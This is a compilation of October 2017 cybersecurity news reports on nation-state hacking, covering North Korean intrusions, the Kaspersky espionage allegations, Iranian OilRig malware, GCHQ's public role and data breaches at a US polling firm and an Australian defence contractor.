“North Korea linked hackers are among the most prolific nation-state threats, targeting not only the U.S. and South Korea but the global financial system and nations worldwide. Their motivations vary from economic enrichment to traditional espionage to sabotage, but all share the hallmark of an ascendant cyber power willing to violate international norms with little regard for potential blowback,” FireEye concludes.

"It doesn't seem like a phishing attack deserves too much attention these days - especially one that was unsuccessful in penetrating target networks,” Eddie Habibi, CEO of PAS Global, told SecurityWeek. “The fact that it was North Korea isn't a big surprise nor that power was in the crosshairs. What is worth noting is that as tensions continue to rise with North Korea, we should expect the intensity of cyber attacks aimed at U.S. critical infrastructure to rise as well.”


Trump Issues Threat Sharing Directive to Intelligence Community
15.10.2017 securityweek BigBrothers
President Trump issued a memorandum on Oct. 5 requiring the intelligence community to establish an inter-agency information sharing network. Agency heads are required to submit a plan within 270 days. Missing from the memorandum is any mention of existing projects such as the Cyber Threat Intelligence Center (CTIC) or the Intelligence Community IT Enterprise (IC ITE, pronounced 'eyesight').

Inter-agency information sharing has been a pressing issue and problem since 9/11 when it was suggested that different agencies had partial information about the terrorist plot, but there was no way to 'connect the dots' and see the overall picture. Since then there have been numerous initiatives to improve information sharing -- such as the Cybersecurity Information Sharing Act (CISA) and the CTIC and IC ITE projects.

IC ITE is a long-term intelligence community initiative to provide what this new memorandum seems to require. The current strategy document, produced by the Office of the Director of National Intelligence (at that time, James Clapper) states (PDF): "The IC ITE represents a strategic shift from agency-centric information technology (IT) to a common enterprise platform where the Intelligence Community (IC) can easily and securely share technology, information, and capabilities across the Community." However, the timeframe covered by this document is 2016 to 2020 -- and it may be that the new Trump memorandum is seeking to speed the process.

Trump has been a critic of the intelligence community since before his election. It is not clear whether this memorandum is designed to replace the existing projects or merely to hasten their completion. Memoranda are used by presidents in a manner similar to executive orders, and place a similar legal requirement on government agencies. They have been described as 'an executive order by another name'.

The gist of the memorandum is that the intelligence community must establish a 'threat actor' information sharing architecture under guidance from NIST, and present their plan to the president within 270 days. "The Secretary of Defense, the Attorney General, the Secretary of Homeland Security, and the Director of National Intelligence, in coordination with the Secretary of State, the Secretary of the Treasury, and the Secretary of Energy, shall, through the Assistant to the President for Homeland Security and Counterterrorism, submit to the President a plan to implement this memorandum."

There is no indication on how the threat sharing is to be implemented; and of course no guarantee that the president will accept the plans. There is, however, a strong concentration on the need to share personal information of potential threat actors. "National security threat actor information," states the memorandum, "comprises identity attributes and associated information about individuals, organizations, groups, or networks assessed to be a threat to the safety, security, or national interests of the United States that fall into one or more of the categories listed in the annex to this memorandum."

'Identity attributes' are then defined as "Information (including biometric and biographic data) that can be used independently or in combination with other data to identify a specific individual."

It is the lack of detail that is most worrying. The devil is always in the detail, comments Christopher Bray, SVP at Cylance Inc. The big question, he suggests, is how this can be translated into policy while respecting applicable laws, civil liberties and individual privacy. "These are extremely important questions that need to be crisply defined and addressed within established legal and constitutional frameworks," he told SecurityWeek. "You only need to think about the clumsy implementation of the 'no fly list' and the examples of completely innocent people arbitrarily getting placed on it in error -- with lack of a clear process for recourse or getting removed, to see what a minefield this could become if not thought through well." Will this be implemented into anything meaningful at all, he wonders, or just become 'policy shelf-ware' that someone can point to later as having 'done something'.

Nathan Wenzler, chief security strategist at AsTech, sees nothing that addresses the long-standing problems for information sharing. "The challenge previously is that each of the agencies involved tends to collect information that is very specific to their purposes and it is in that specificity that there is fear that others who possess the data will be able to discern how that data was obtained and collected. This has caused many in the intelligence community to fear the compromise of those data gathering sources, whether human or technological, and has made previous efforts to integrate and share such data nearly impossible."

Like Bray, he is also concerned about the privacy impact of the memorandum. "The potential for compromise to intelligence sources, the vast privacy concerns that will exist should any U.S. citizen wrongly be targeted in these profiling efforts, and the fact that effectively locating multiple copies of the same data sets in different places means that cyber attackers have more potential targets in which to steal this information means this memorandum creates far more questions than it begins to answer."

Ross Rustici, senior director, intelligence services at Cybereason, wonders if the memorandum is designed to increase the capability of the CTIC, "which was stood up in the twilight of Obama's administration. The idea behind the CTIC," he told SecurityWeek, "was to create a new cyber threat center for cyber. However, because the initial operating capacity was being built as the administration was packing up it never got the full capability or support necessary to be effective."

However, he also suggests that the memorandum is indicative of the slow progress made to date. It "shows how little the creation of the Director of National Intelligence and the 9/11 Commission has impacted business as usual in the intelligence community. In addition, the focus on 'threat actors and their networks' speaks to something beyond sharing data for defending networks. This directive is about increasing the intelligence community's ability to share all the dots they already have to connect them better."


Hacking the Election: Security Flaws Need Fixing, Researchers Say
15.10.2017 securityweek BigBrothers
Hackers could have easily infiltrated US voting machines in 2016 and are likely to try again in light of vulnerabilities in electronic polling systems, a group of researchers said Tuesday.

A report with detailed findings from a July hacker conference which demonstrated how voting machines could be manipulated concluded that numerous vulnerabilities exist, posing a national security threat.

The researchers analyzed the results of the "voting village" hacking contest at the DefCon gathering of hackers in Las Vegas this year, which showed how ballot machines could be compromised within minutes.

"These machines were pretty easy to hack," said Jeff Moss, the DefCon founder who presented the report at the Atlantic Council in Washington. "The problem is not going away. It's only going to accelerate."

The report said the DefCon hack was just the tip of the iceberg -- with potential weaknesses in voter databases, tabulating software and other parts of the system.

The researchers said most voting machines examined included at least some foreign-manufactured parts, raising the possibility that malware could be introduced even before the devices are delivered.

"This discovery means that a hacker's point-of-entry into an entire make or model of voting machine could happen well before that voting machine rolls off the production line," the report said.

"With an ability to infiltrate voting infrastructure at any point in the supply chain process, then the ability to synchronize and inflict large-scale damage becomes a real possibility."

- No certainty on 2016 -

Harri Hursti, a researcher with Nordic Innovation Labs and a co-author of the report, said it's impossible to say with certainty if votes were tampered with in 2016 because many systems "don't have the capacity" to be audited.

The report said five US states operate entirely on paperless systems which have no paper trail to be reviewed and another nine states are partially paperless.

"The only way to know is if the hacker tells you," he said, adding that "it can be done without leaving tracks."

Douglas Lute, former US ambassador to NATO who presented the report, said in a forward to the report that the findings highlight "a serious national security issue that strikes at the core of our democracy."

Although some researchers in the past have shown individual machines could be breached, this report suggests a range of vulnerabilities across a range of hardware, software and databases.

"What the report shows is that if relative rookies can hack a voting system so quickly, it is difficult to deny that a nefarious actor -- like Russia -- with unlimited time and resources, could not do much greater damage," said University of Chicago cybersecurity instructor Jake Braun, another co-author.

The threat becomes all the more grave "when you consider they could hack an entire line of voting machines, remotely and all at once via the supply chain," he added.

In presenting the findings, the researchers said members of the DefCon hacker community would work with academics and security researchers in a new coalition aimed at improving election security.


UK's Top Spy Agency Coming Out of the Shadows: GCHQ Director
15.10.2017 securityweek BigBrothers

The UK's Government Communications Headquarters (GCHQ) is one of the UK's more secretive intelligence agencies. Its existence was not acknowledged until 1976, when investigative journalists Duncan Campbell and Mark Hosenball (an American journalist working in the UK) 'outed' the organization in an article in Time Out. Hosenball was rapidly deported because he was deemed to be a threat to UK national security.

GCHQ started life at the end of the First World War as the Government Code and Cypher School (GC&CS). It operated from Bletchley Park during the Second World War where it, and particularly Alan Turing, were instrumental in breaking the German Enigma encryption system. Even that was not acknowledged for thirty years. The organization moved to Cheltenham, now occupying the 'doughnut', after the war -- and changed its name to GCHQ.

In the early 1970s, a GCHQ staff member named James Ellis developed the concept of public key encryption -- but not being a mathematician, could not make a working implementation. It was not until the 1980s that the Americans Whitfield Diffie and Martin Hellman independently discovered public key encryption. GCHQ's efforts were not publicly disclosed until 1997.

This predilection for secrecy is, overtly at least, slowly breaking down. It probably started and is an inevitable consequence of the evolution of the new National Cyber Security Centre (NCSC), which is part of GCHQ. Communications has always been the domain of GCHQ; but the rise of the internet means that crime and communications intelligence cannot realistically be separated.

Locating NCSC within GCHQ is logical, where it is able to draw upon the enormous GCHQ cyber expertise to combat crime -- whether that is terrorist related or organized crime related. However, fighting crime cannot be done in the publicity vacuum that has been the traditional domain of GCHQ. NCSC, currently celebrating its first anniversary, talks to and works with business, and advises the public on cyber security awareness. GCHQ is very slowly emerging from the shadows.

The process of emergence was highlighted on Saturday when the director of GCHQ, Jeremy Fleming, made his most extensive public comment so far in an article published in the Telegraph. He moved from MI5 to GCHQ in March 2017. Without going into details on the amount, he writes, "The Government's investment in a bigger GCHQ gives us a chance to recruit the brightest and best from across our society -- as the threat becomes more diverse, so must the workforce that tackles it."

Inside GCHQ 3
Inside GCHQ 3 (Image Copyright GCHQ)
Much of that funding, he says, will go into making GCHQ a cyber organization as much as an intelligence organization. The difference is moot, since GCHQ has been using its cyber expertise for many years. Part of the Edward Snowden revelations disclosed a GCHQ project known as Tempora, which allegedly covertly gathered vast troves of personal internet communications which were then shared with the U.S. National Security Agency (NSA). GCHQ was also accused of targeting a Belgian telecommunications company, Belgacom, where staff computers were infected with malware in a 'quantum insert' attack to secure access to customers.

"By its nature," wrote Fleming, NCSC "has to work closely with the private sector; it works at lower (or without) security classifications, proactively engages with the media, and has a high profile in schools and universities. All of this can feel deeply challenging for a GCHQ that by necessity has worked in the shadows."

Fleming describes GCHQ as being 'at the heart of the nation's security.' "Over the past year," he writes, GCHQ/NCSC "has responded to nearly 600 significant incidents requiring a national, coordinated response. In dealing with these cases, from the WannaCry ransomware affecting the NHS through the attack on Parliament to lesser-known but important compromises and criminal attacks, the NCSC drew on GCHQ's data, analytical capabilities, skills and partnerships, which help us to prevent attacks as well as respond to them."

The WannaCry attack typifies the need to combine cyber intelligence and cybercrime activities. Ransomware is mainstream criminal activity; but the WannaCry outbreak is thought to have been delivered by nation-state actors working for North Korea. The combination of geopolitics and cybersecurity is getting increasingly entwined. "Keeping our citizens safe and free online must become and remain as much part of our mission as our global intelligence reach and our round-the-clock efforts against terrorism," he concludes.

It remains to be seen whether almost a century of secrecy can be altered in the new GCHQ. Whether it can or not, however, the combination of GCHQ and NCSC expertise is broadly welcomed. "The efforts of the British government to assure cybersecurity and online safety for its citizens are laudable, and should serve as an example to other countries," commented Ilia Kolochenko, CEO of High-Tech Bridge.

He warns, however, that it is an impossible task for a single nation. "However, the Internet is an open world without borders, and thus it's not an easy task to keep digital peace in a particular country or geographical area. It is virtually impossible to keep citizens of a particular country safe."

Since the problem is international and not entirely cyber-related, so must be the solution. Cybersecurity cannot be achieved, "without first resolving the intertwined problems of cybercrime, poverty, political crises and nation-state attacks. International cooperation, global economic and political stability -- are vitally important to fight skyrocketing cybercrime."

Peter Yapp, Deputy Director at NCSC, will be speaking on a panel at SecurityWeek's 2017 ICS Cyber Security Conference on Oct. 25 in Atlanta to discuss the growing global threat of international intrusions and cyberattacks on critical national infrastructure. Yapp will be joined by Simon Hodgkinson, CISO at BP; Dr. Kevin Jones, Head of Cyber Security Architecture, Innovation and Scouting at Airbus; and Dr. Chris Hankin, Director at the UK ICS cyber security Research Institute (RITICS).


North Korea Hacked Seoul's War Plans: Report
15.10.2017 securityweek BigBrothers
North Korea Hackers

North Korean computer hackers have stolen hundreds of classified military documents from South Korea including detailed wartime operational plans involving its US ally, a report said Tuesday.

Rhee Cheol-Hee, a lawmaker for the ruling Democratic party, said the hackers broke into the South's military network in September last year and gained access to 235 gigabytes of sensitive data, the Chosun Ilbo daily reported.

Among the leaked documents was Operational Plans 5015 for use in case of war with the North and including procedures for "decapitation" attacks on leader Kim Jong-Un, the paper quoted Rhee as saying. Rhee, a member of parliament's defence committee, could not be reached for comment, but his office said he had been quoted correctly.

The report comes amid heightened fears of conflict on the Korean peninsula, fuelled by US President Donald Trump's continued threats of military action against Pyongyang to tame its weapons ambitions.

In his latest tweet over the weekend, Trump reiterated that diplomatic efforts with North Korea have consistently failed, adding that "only one thing will work."

Pentagon spokesman Colonel Rob Manning said he was aware of the report, but declined to confirm or deny any aspect of it.

"I can assure you that we are confident in the security of our operations plans and our ability to deal with any threat from North Korea," Manning told Pentagon reporters.

"I am not going to address whether or not that (hack) has occurred. What I am going to tell you is that the (South Korea)-US alliance, that bilateral entity, is there to deal with those types of situation and safeguard against them."

- 80 percent unidentified -

Citing Seoul's defence ministry, Rhee said that 80 percent of the leaked documents had yet to be identified.

But the contingency plan for the South's special forces was stolen, he said, as well as details about annual joint military drills with the US and information on key military facilities and power plants.

A ministry spokesman declined to confirm the report, citing intelligence matters.

In May, the ministry said North Korea had hacked into Seoul's military intranet but did not say what had been leaked.

Pyongyang has a 6,800-strong unit of trained cyberwarfare specialists, according to the South Korean government. It has been accused of launching high-profile cyberattacks, including the 2014 hacking of Sony Pictures.

The Chosun Ilbo story was the second report Tuesday of military-related cyber-attacks in the Asia-Pacific.

Australia's government said separately an unidentified defence contractor had been hacked and a "significant amount of data" stolen.

There were 47,000 cyber-incidents in the last 12 months, a 15 percent increase from the previous year, Minister for Cyber Security Dan Tehan said in Canberra as he unveiled a report by the Cyber Security Centre.

The defence contractor was exploited via an internet-facing server, with the cyber-criminals using remote administrative access to remain in its network, the report said.

The hacker was reportedly based in China, but Tehan told the Australian Broadcasting Corporation that "we don't know and we cannot confirm exactly who the actor was."


Iranian Cyberspies Use New Trojan in Middle East Attacks
15.10.2017 securityweek BigBrothers
A cyberespionage group previously linked to Iran has been using a new Trojan in attacks aimed at entities in the Middle East, Palo Alto Networks reported on Monday.

The threat actor, known as OilRig, was recently spotted launching attacks against an organization within the government of the United Arab Emirates (UAE).

When it first discovered the group’s activities back in May 2016, Palo Alto Networks believed the attacks had been carried out by a known group, but researchers later determined that the campaign was actually the work of a new actor, which is now tracked as OilRig.

OilRig has been known to use a remote access trojan (RAT) named ISMDoor, which researchers also identified in attacks launched by another Iran-linked cyberspy group known as Greenbug.OilRig hackers use new Trojan

In attacks seen by Palo Alto Networks in July 2017, OilRig had started using a new piece of malware dubbed “ISMAgent,” which appeared to be a variant of the ISMDoor RAT. In even more recent attacks, observed by experts in August 2017, a new injector Trojan was used by the attackers.

The new malware, tracked as “ISMInjector,” is a tool that has a sophisticated architecture and it includes anti-analysis techniques that were not previously leveraged by this group.

“The complex structure and inclusion of new anti-analysis techniques may suggest that this group is increasing their development efforts in order to evade detection and gain higher efficacy in their attacks,” Palo Alto Networks researchers said in a blog post.

In the attack aimed at the UAE government, hackers delivered their malware using malicious documents attached to emails with the subject line “Important Issue.” What made the emails interesting was the fact that they came from the targeted organization’s own domain. While experts initially believed that the attackers had spoofed the sender, they later determined that they actually used a compromised Outlook Web Access (OWA) account whose credentials they obtained in a previous phishing attack.

The malicious documents sent to the UAE government, tracked by Palo Alto as “ThreeDollars,” delivered the new ISMInjector Trojan, which in turn dropped a variant of the ISMAgent backdoor by injecting it into a remote process it created.

In order to make analysis of ISMInjector more difficult, the malware’s developers have relied on what researchers call “state machines” to create a new process and inject the payload into that process. Each state is responsible for conducting a particular action and it specifies the next state that should be executed.

Since the states are not executed in sequential order, researchers analyzing the malware have to jump around in the code to determine how it works, which makes it more challenging to investigate the threat. Analysis of the malware is further complicated by the use of a crypter.

Iran appears to have several cyber espionage groups, including APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


Israel Hacked Kaspersky, Caught Russian Spies Hacking American Spies, But...
14.10.2017 thehackernews BigBrothers
The cold cyber war has just turned hot.
According to a story published today by the New York Times, Israeli government hackers hacked into Kaspersky’s network in 2015 and caught Russian government hackers red-handed hacking US government hackers with the help of Kaspersky.
In other words — Russia spying on America, Israel spying on Russia and America spying on everyone.
What the F^#% is going around?
It is like one is blaming another for doing exactly the same thing it is doing against someone else. Wow!
Well, the fact that everyone is spying on everyone is neither new nor any secret. However, somehow now Kaspersky Labs is at the centre of this international espionage tale for its alleged devil role.
Just last week, the Wall Street Journal, an American media agency, published a story against the Kaspersky, a Russian antivirus provider, claiming that the Russian government hackers stole highly classified NSA documents and hacking tools in 2015 from a staffer's home PC with the help of Kaspersky Antivirus.
Even if the incident is real, quoting multiple anonymous sources from US intelligence community, Wall Street Journal article failed to provide any substantial evidence to prove if Kaspersky was intentionally involved with the Russian spies or some hackers simply exploited any zero-day vulnerability in the Antivirus product.
Now, the latest NYT story, again quoting an anonymous source from Israeli Intelligence Agency, seems another attempt to justify the claims made by WSJ article about Russians hacking NSA secrets.
"The role of Israeli intelligence in uncovering [the Kaspersky Labs] breach and the Russian hackers’ use of Kaspersky software in the broader search for American secrets have not previously been disclosed," the NYT reported.
According to the report, United States officials began an immediate investigation in 2015 after Israel officials notified the U.S. National Security Agency (NSA) about the possible breach.
Indeed, in mid-2015, Moscow-based Kaspersky Lab detected sophisticated cyber-espionage backdoor within its corporate network and released a detailed report about the intrusion, although the company did not blame Israel for the attack.
At the time, Kaspersky said that some of the attack code the company detected shared digital fingerprints first found in the infamous Stuxnet worm, same malware which was developed by America and Israel to sabotage Iran's nuclear program in 2010.
This suspicion of malicious Kaspersky’s behaviour eventually leads the U.S. Department of Homeland Security (DHS) to ban and remove Kaspersky antivirus software from all of its government computers.
Moreover, just last month, the U.S. National Intelligence Council shared a classified report with NATO allies concluding that the Russian FSB intelligence agency had access to Kaspersky's databases and as well as the source code.
However, Kaspersky Lab has always denied any knowledge of, or involvement in, any cyber espionage operations.
"Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts," Kaspersky's founder Eugene Kaspersky said in a statement.
Eugene today also announced that he has just launched an internal investigation to cross-check if United States LEA has relevant facts.
Eugene previously admitted there's a possibility that NSA hacking tools could have been picked up as malware by their Anti-malware scanner because antivirus products are designed to work in that way.
"We absolutely and aggressively detect and clean malware infections no matter the source," the antivirus company said.
Until now it is quite tough to judge if Kaspersky was involved in any wrongdoing, but the ball is in America's court, who has to provide the actual evidence to the world about the highly classified Israeli counter-intelligence operation.


Republican polling firm Victory Phones database was hacked
14.10.2017 securityaffairs BigBrothers

The databases of the Republican polling firm Victory Phones were hacked just after the 2016 election, exposing donor records.
Victory Phones, an automated phone research, and data compilation firm was hacked in January exposing data on hundreds of thousands of Americans who submitted donations to Republican political campaigns.

Victory Phones carries out polling on behalf of Republican candidates using phone calling, it also implemented a fundraising systems for the political campaigns.

According to ZDNet, who first reported the incident, the hack exposed several database files, one of them is a 223 gigabytes archive containing about two billion records

Stolen records include 166,046 unique email addresses, and contains names, postal and email addresses, phone numbers, genders, and donation amounts.

Follow
Have I been pwned? ✔@haveibeenpwned
New breach: Victory Phones exposed 166k addresses via unsecured Mongo DB. 75% were already in @haveibeenpwned. More: http://www.zdnet.com/article/republican-polling-firm-hacked-exposing-donor-records/ …

11:05 PM - Oct 11, 2017
Photo published for A Republican polling firm was hacked, exposing donor records
A Republican polling firm was hacked, exposing donor records
The data was stolen just after the 2016 election, the polling outfit confirmed.

zdnet.com
2 2 Replies 31 31 Retweets 22 22 likes
Twitter Ads info and privacy
Experts believe the hackers targeted the company because they were primarily interested in individual donations made to political campaigns.

“According to public records, the company gave $207,602 to a campaign by Rand Paul (R-KY) and $79,646 to Martha Roby (R-AL). The company also gave $103,977 to the Republican Party of Michigan, where the company is located, and $64,229 to the Republican National Committee, among others.” reported ZDnet.

The data contains names, postal and email addresses, phone numbers, genders, and donation amounts.

The popular cyber security expert Troy Hunt, who runs the data breach notification service Have I Been Pwned reached out to several individuals whose data was included in the stolen databases and all of those confirmed the authenticity of the information leaked online.

The Victory Phones was running an unsecured MongoDB installations as confirmed by the chief executive David Dishaw who added that the company never received a ransom note.

“We can confirm that in early January 2017, we were one of tens of thousands of users whose MongoDB instance was hacked. We received no ransom note or communication regarding this intrusion, in the immediate aftermath, or up until even now. We took steps to enhance the security of our data, and notified our users at that time of the breach. We will continue to keep them up to date as we come into any information that is relevant.”

MongoDB ransom attacks soared early this year, according to the Australian Communications and Media Authority Antipodes the number of hacked systems more than double to 27,000 in just a day. According to the experts, the hackers implement an extortion mechanism copying and deleting data from vulnerable databases.

Crooks request the payment of a ransom in order to return data and help the company to fix the flaw they exploited. Late 2016, I reported the story of a mysterious attacker that went online with the harak1r1 moniker, he was breaking into unprotected MongoDB databases, stealing their content, and requesting for a 0.2 bitcoins (US$184) ransom to return the data.

The attacks were discovered by the Co-founder of the GDI Foundation, Victor Gevers, who warned of poor security for MongoDB installations in the wild

ZDnet confirmed that at the time of writing, a Victory Phones’s server with an open database port is still indexed on Shodan.

“The breach may not be significant in terms of numbers of individuals affected compare to other breaches of voter information — much of the data is already public on the Federal Election Commission’s website. But the hack represents yet another data exposure at a time of heightened concern about election interference.” continues ZDNet.

Hunt confirmed that 75 percent of email addresses were already in Have I Been Pwned’s database.


Israel hackers caught Russian cyber spies abusing Kaspersky AV to steal NSA secrets
14.10.2017 securityaffairs BigBrothers

Israeli hackers compromised the Kaspersky infrastructure and caught Russian spies using AV tool to harvest NSA exploits. Kaspersky was not aware of the hack.
There is still a heated discussion about the alleged hack of Kaspersky’s antivirus and its use to steal an NSA exploit from a US subcontractor.

Explosive new revelations put at risk the US-Israeli cooperation.

Israeli cyber spies looked on as Russian state-sponsored hackers breached Kaspersky software two years ago to gather data on US intelligence programs.

The Israeli agents discovered the Russian offensive after they also hacked into the Kaspersky software. This revelation clarifies the position of the security firm that was aware that its software was hacked by the intelligence agencies.

Last month, the US government decided to stop using the Russian firm’s software on its computers.

The Israelis reported the discovery to the US intelligence, in response, the US Government banned the Russian firm solutions from US Government agencies.

“It was a case of spies watching spies watching spies: Israeli intelligence officers looked on in real time as Russian government hackers searched computers around the world for the code names of American intelligence programs.” reported The New York Times.

“The Israeli officials who had hacked into Kaspersky’s own network alerted the United States to the broad Russian intrusion, which has not been previously reported, leading to a decision just last month to order Kaspersky software removed from government computers.”

The Russian operation that allowed to steal classified documents from an NSA employee who had stored them on his PC running Kaspersky’s antivirus software had been described by “multiple people who have been briefed on the matter”.

The Russian hackers hacked Kaspersky’s servers to harvest any code detected by the antivirus that matched known indicator of compromises for NSA exploits.

“The role of Israeli intelligence in uncovering [the Kaspersky] breach and the Russian hackers’ use of Kaspersky software in the broader search for American secrets have not previously been disclosed,” the NYT reported.

The NSA, the White House and both Israeli and Russian embassies have not commented on the matter.

Kaspersky has published a statement claiming it is not involved in the Russian operation and confirmed it was victims of the events.


Kaspersky Lab ✔@kaspersky
Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts.

1:16 AM - Oct 11, 2017
26 26 Replies 60 60 Retweets 94 94 likes
Twitter Ads info and privacy
“As the integrity of our products is fundamental to our business, Kaspersky Lab patches any vulnerabilities it identifies or that are reported to the company,” the statement said.

“Kaspersky Lab reiterates its willingness to work alongside US authorities to address any concerns they may have about its products as well as its systems, and respectfully requests any relevant, verifiable information that would enable the company to begin an investigation at the earliest opportunity.”

At the time it is not clear what information was exfiltrated by the Russian hackers, and probably we will never know it, but it seems that Kremlin’s cyber spies remained into corporate network for two years.

Eugene Kaspersky announces an internal investigation about the facts were reported by the media.

Follow
Eugene Kaspersky ✔@e_kaspersky
I am launching internal investigation to cross-check. If US LEA has relevant facts - please share.

1:29 AM - Oct 11, 2017
26 26 Replies 147 147 Retweets 196 196 likes
Twitter Ads info and privacy
Kaspersky hacked by Russian hackers

In 2015, Kaspersky detected a sophisticated cyber attack against its infrastructure, hackers leveraged a sophisticated strain of malware tracked as Duqu.

Experts linked Duqu to the Tilded Platform, the same factory behind Stuxnet that was known to have been developed by Israel and US.

Researchers with Kaspersky named the platform “Tilded” because many of the files in Duqu and Stuxnet have names beginning with the tilde symbol “~” and the letter “d.”

The security firm was also infected by the Duqu 2.0 spyware, which was once again linked to the American-Israeli-developed Stuxnet malware.

In response to the recent revelation on the Kaspersky hack, Symantec CEO Greg Clark told Reuters that his company will no longer let governments inspect its source code.

Other concerns are related to fact that HPE allowed Russians to review the code of ArcSight software also used by the Pentagon.


ASD revealed hacker stole 30GB of sensitive data on Australia’s military capabilities
13.10.2017 securityaffairs BigBrothers

The Australia’s foreign intelligence Agency ASD has revealed military sensitive information has been stolen by hackers who breached a Department of Defence contractor.
The Australia’s foreign intelligence agency, the Australian Signals Directorate (ASD), admitted a hacker has stolen over 30 GB of military documents. Stolen data includes details on fighter jets, military aircraft, and naval ships.

The hacker stole the huge trove of confidential data on military capabilities at an unnamed Department of Defence contractor. The ASD spokesperson Mitchell Clarke, who revealed the incident, confirmed that not “top secret” data was compromised, but data breach included sensitive information not publicly accessible.

The intelligence agency dubbed the hacker “Alf,” after a character in the “Home and Away” Australian TV soap opera.

ASD military data breach 2.jpg

The stolen files include confidential information, diagrams, and plans and details about the country’s arsenal, such as details on the new F-35 Joint Strike Fighter jet, the Boeing P-8 Poseidon submarine-hunting airplane, Lockheed-Marting C-130 transport aircrafts, JDAM guided bombs, and data on “some naval ships.”

“That ITAR data included information on the the [F-35] Joint Strike Fighters, the C-130, the P-8 Poseidon, the JDAM –that’s a smart bomb – and a few Australian naval vessels,” Mr Clarke said.

ASD military data breach.jpg

According to The Sydney Morning Herald, some of the stolen data was linked to the International Traffic in Arms Regulations, a US regulatory regime.

“A CYBER attack was successfully carried out by hackers who gained access to the computer system of a national security contractor last year.” reported the website news.com.au.

“The Federal Government is set to reveal details about the hack today when Assistant Minister for Cyber Security Dan Tehan launches the Australian Cyber Security Centre’s (ACSC) annual threat report.”

The data breach is dated back July 2016, but the ASD discovered it in November 2016, when a “partner organization” notified the Agency.

According to the ASD, the root cause of the incident was the use of weak passwords for the authentication at some of the target systems used by the defense contractor.

The defense contractor has roughly 50 employees and only one of them was tacked to secure its network.

ASD experts who conducted the forensic investigation on the breached servers found evidence of the China Chopper web shell, it is likely associated with the intrusion.

At the time is still unclear the threat actors’ motivation.

“It could have been a state actor, it could have been cyber criminals, and that’s why it was taken so seriously,” Mr Tehan said.

“We’re not 100 per cent sure, and that’s one of the difficulties of this area.”


North Korea Hacked Seoul's War Plans: Report
10.10.2017 securityweek BigBrothers

North Korean computer hackers have stolen hundreds of classified military documents from South Korea including detailed wartime operational plans involving its US ally, a report said Tuesday.

Rhee Cheol-Hee, a lawmaker for the ruling Democratic party, said the hackers had broken into the South's military network last September and gained access to 235 gigabytes of sensitive data, the Chosun Ilbo daily reported.

Among the leaked documents was Operational Plans 5015 for use in case of war with the North and including procedures for "decapitation" attacks on leader Kim Jong-Un, the paper quoted Rhee as saying.

Rhee, a member of parliament's defence committee, could not be reached for comment but his office said he had been quoted correctly.

The report comes amid heightened fears of conflict on the Korean peninsula, fuelled by US President Donald Trump's continued threats of military action against Pyongyang to tame its weapons ambitions.

In his latest tweet over the weekend, Trump reiterated that diplomatic efforts with North Korea have consistently failed, adding that "only one thing will work".

Citing Seoul's defence ministry, Rhee said that 80 percent of the leaked documents had yet to be identified.

But the contingency plan for the South's special forces was stolen, he said, as well as details about annual joint military drills with the US and information on key military facilities and power plants.

A ministry spokesman declined to confirm the report, citing intelligence matters.

In May the ministry said North Korea had hacked into Seoul's military intranet but did not say what had been leaked.

Pyongyang has a 6,800-strong unit of trained cyber-warfare specialists, according to the South Korean government. It has been accused of launching high-profile cyber-attacks including the 2014 hacking of Sony Pictures.

The Chosun Ilbo story was the second report Tuesday of military-related cyber-attacks in the Asia-Pacific.

Australia's government said separately an unidentified defence contractor had been hacked and a "significant amount of data" stolen.

There were 47,000 cyber-incidents in the last 12 months, a 15 percent increase from the previous year, Minister for Cyber Security Dan Tehan said in Canberra as he launched a report by the Cyber Security Centre

The defence contractor was exploited via an internet-facing server, with the cyber-criminals using remote administrative access to remain in its network, the report said.

The Australian newspaper reported that the hacker was based in China but Tehan told the Australian Broadcasting Corporation that "we don't know and we cannot confirm exactly who the actor was".